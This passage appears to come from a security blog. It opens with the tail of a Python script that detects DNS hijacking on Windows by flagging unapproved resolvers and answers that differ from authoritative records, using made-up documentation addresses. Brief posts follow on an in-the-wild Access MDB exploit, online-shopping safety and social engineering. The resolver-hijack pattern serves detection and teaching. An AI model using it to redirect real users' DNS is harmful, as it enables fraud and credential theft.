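    Returns [(guid, [unapproved resolver, ...])] for every interface whose
    effective resolver list contains an address not in `approved`.
    """
    findings = []
    for guid, values in interfaces.items():
        static = parse_nameserver_value(values.get("NameServer", ""))
        dhcp = parse_nameserver_value(values.get("DhcpNameServer", ""))
        effective = static or dhcp
        rogue = [ip for ip in effective if ip not in approved]
        if rogue:
            findings.append((guid, rogue))
    return findings


# Constructed data (documentation address ranges).
AUTHORITATIVE = {
    "bank.example": {"198.51.100.10", "198.51.100.11"},
    "mail.example": {"198.51.100.20"},
    "shop.example": {"198.51.100.30"},
}
ANSWERS = {
    "192.0.2.53": {    # corporate resolver: always inside the authoritative set
        "bank.example": {"198.51.100.10"},
        "mail.example": {"198.51.100.20"},
        "shop.example": {"198.51.100.30"},
    },
    "203.0.113.66": {  # open resolver: correct for everything except the bank
        "bank.example": {"203.0.113.80"},
        "mail.example": {"198.51.100.20"},
        "shop.example": {"198.51.100.30"},
    },
}
APPROVED_RESOLVERS = {"192.0.2.53", "192.0.2.54"}
INTERFACES = {
    "{1f0e0e1a-0000-4000-8000-000000000001}": {
        "NameServer": "", "DhcpNameServer": "192.0.2.53 192.0.2.54"},
    "{1f0e0e1a-0000-4000-8000-000000000002}": {
        "NameServer": "203.0.113.66,192.0.2.53", "DhcpNameServer": "192.0.2.53"},
}

if __name__ == "__main__":
    for v in compare_resolvers(ANSWERS, AUTHORITATIVE):
        print(v)
    print(audit_interfaces(INTERFACES, APPROVED_RESOLVERS))
```

The second interface above is the hijacked pattern: DHCP still hands out the corporate resolver, but a static NameServer entry has been written ahead of it, so the machine silently asks the rogue server first. Reading the real values on a Windows host (via the registry or `ipconfig /all`) and feeding them to `audit_interfaces` is the only part left to the reader.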

Microsoft Access - Malicious Exploit in-the-wild

Users should avoid unexpected MDB files found in email or offered as downloads from websites. They should also stay up-to-date on security patches and AV protection. Hopefully, this will be patched as part of the January security updates.

Active Exploitation Using Malicious Microsoft Access Databases

QUOTE: Online criminals are exploiting a flaw in the Microsoft Office Access database to install unauthorized software on computers, the United States Computer Emergency Readiness Team (US-CERT) has warned. In its brief warning, US-CERT offered few details on the attack, saying simply that the organization is "aware of active exploitation" of the problem by criminals who have sent specially crafted Microsoft Access Database (.mdb) files to victims.

Exploit based on Microsoft Jet DataBase Engine MDB File Parsing Remote Buffer Overflow Vulnerability

Kim Komando - offers 7 question quiz for e-commerce shopping

Kim Komando shares privacy and security tips each week on her national radio talk show. This quiz offers 7 questions related to e-commerce security -- thankfully I was 7 for 7.

QUOTE: With Christmas coming up, many of us are turning to the Internet. The thousands of online retailers make shopping from home a pleasure. The trend is a pleasure for Web crooks, too. They'll do whatever it takes to lighten your wallet.

The bad guys can be thwarted if you're careful. With that in mind, you'll find my quiz interesting. Just how much do you really know about safe shopping?

Kim Komando - How secure are you when you go shopping?

Steve Riley - Excellent Powerpoint presentation on Social Engineering Risks

The PowerPoint slide show is one of the most comprehensive presentations I've seen on the topic of social engineering. The human element is added as "layer 8" on top of the classical seven-layer OSI model. The PowerPoint even includes some humor to keep things interesting throughout. There's also a podcast, a 7 minute Q&A with Steve Riley on social engineering dangers.

Podcast and PPT links can be found here

Steve Riley - Defending OSI level 8
Powerpoint 7.2MB - 96 slides
